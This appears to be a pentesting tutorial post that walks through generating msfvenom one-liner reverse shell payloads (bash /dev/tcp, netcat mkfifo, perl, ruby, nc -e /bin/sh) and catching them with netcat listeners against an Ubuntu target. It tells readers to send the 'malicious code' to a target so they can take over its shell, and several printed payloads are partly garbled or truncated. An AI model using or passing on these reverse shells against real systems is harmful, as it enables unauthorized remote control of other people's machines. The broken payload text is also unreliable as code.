Spawn TTY Shell using Msfvenom (One Liner Payload)

Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat by using single line payload which is also known as stagers exploit that comes in metasploit.
Basically there are two types of terminal TTYs and PTs. TTYs are Linux/Unix shell which is hardwired terminal on a serial connection connected to mouse or keyboard and PTs is suedo tty terminal, to get the copy of terminals on network connections via SSH or telnet.

Let’s start!!
Attacker: Kali Linux
Target: Ubuntu

Open the terminal in your kali Linux and type msfconsole to load metasploit framework, now search all one-liner payloads for UNIX system using search command as given below, it will dump all exploit that can be used to compromise any UNIX system.
search cmd/unix

From given below image you can observed that it has dump all exploit that can be used to compromised any UNIX system. In this tutorial we are going to use some of payloads to spawn a TTY shell.

Compromise Bash shell
In order to compromise a bash shell you can use reverse_bash  payload along msfvenom as given in below command.
msfvenom –p cmd/unix/reverse_bash lhost= lport=1111 R
 Here we had entered  following detail to generate one-liner raw payload.
-p : type of payload you are using i.e. cmd/unix/reverse_bash
Lhost: listening IP address i.e. Kali Linux IP
Lport: Listening port number i.e. 1111 (any random port number which is not utilized by other services)
R: Its stand for raw payload

As shown in below image, the size of generated payload is 67 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTy shell.

For example when target will open (0<&121-;exec 121<>/dev/tcp/;sh <&121 >&121 2>&121>) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 1111
As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.
For example:
whoami: it tells you are root user of the system you have compromised.

Compromise Netcat shell

In order to compromise a netcat shell you can use reverse_netcat payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_netcat lhost= lport=2222 R
 Here we had entered  following detail to generate one-liner raw payload.
-p : type of payload you are using i.e. cmd/unix/reverse_netcat
Lhost: listening IP address i.e. Kali Linux IP
Lport: Listening port number i.e. 2222 (any random port number which is not utilized by other services)
R: Its stand for raw payload

As shown in below image, the size of generated payload is 104 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

when target will open ( mkfifo /tmp/admoszx; nc 2222 0
/tmp/admson 2>&1; rm /tmp/admoszx ) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 2222
As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell.

Compromise Perl shell

In order to compromise a perl shell you can use reverse_perl payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_perl lhost= lport=3333 R
 Here we had entered  following detail to generate one-liner raw payload.
-p : type of payload you are using i.e. cmd/unix/reverse_perl
Lhost: listening IP address i.e. Kali Linux IP
Lport: Listening port number i.e. 3333 (any random port number which is not utilized by other services)
R: Its stand for raw payload

As shown in below image, the size of generated payload is 232 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Now again when target will open (perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};) ) malicious code in terminal, attacker will get reverse shell through netcat.

nc -lvp 3333
As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell. Here we found target IP address: by executing ifconfig command in his TTY shell.

Compromise Python shell

In order to compromise a python shell you can use reverse_Python payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_python lhost= lport=4444 R
 Here we had entered  following detail to generate one-liner raw payload.
-p : type of payload you are using i.e. cmd/unix/reverse_python
Lhost: listening IP address i.e. Kali Linux IP
Lport: Listening port number i.e. 4444 (any random port number which is not utilized by other services)
R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open the following malicious code in his terminal, attacker will get reverse shell through netcat.


nc -lvp 4444
As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.
For example:
ifconfig: it tells IP configuration of the system you have compromised.

Compromise Ruby shell

In order to compromise a ruby shell you can use reverse_ruby payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_ruby lhost= lport=5555 R
 Here we had entered  following detail to generate one-liner raw payload.
-p : type of payload you are using i.e. cmd/unix/reverse_ruby
Lhost: listening IP address i.e. Kali Linux IP
Lport: Listening port number i.e. 5555 (any random port number which is not utilized by other services)
R: Its stand for raw payload

As shown in below image, the size of generated payload is 131 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

Again when the target will open (ruby -rsocket -e 'exit if fork;"","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print}end') malicious code in his terminal, attacker will get reverse shell through netcat.

As you can observe the result from given below image where attacker has successfully accomplish targets system TTY shell, now he can do whatever he wish to do.
For example:
ifconfig: it tells IP configuration of the system you have compromised.

Compromise bin/sh shell

In order to compromise a command shell you can use reverse_netcat_gaping payload along msfvenom as given in below command.
msfvenom -p cmd/unix/reverse_netcat_gaping lhost= lport=6666 R
 Here we had entered  following detail to generate one-liner raw payload.
-p : type of payload you are using i.e. cmd/unix/reverse_netcat_gaping
Lhost: listening IP address i.e. Kali Linux IP
Lport: Listening port number i.e. 6666 (any random port number which is not utilized by other services)
R: Its stand for raw payload

As shown in below image, the size of generated payload is 533 bytes, now copy this malicious code and send it to target. After that start netcat for accessing reverse connection and wait for getting his TTY shell.

In order to access bin/sh shell of target system for compromising TTY shell firslty we had access PTs termianl  of  target through SSH and then past the malicious code (nc 6666 -e /bin/sh
) inside PTY terminal.

nc -lvp 6666
From given below image you can observe that we had successfully access TTy shell of target system.


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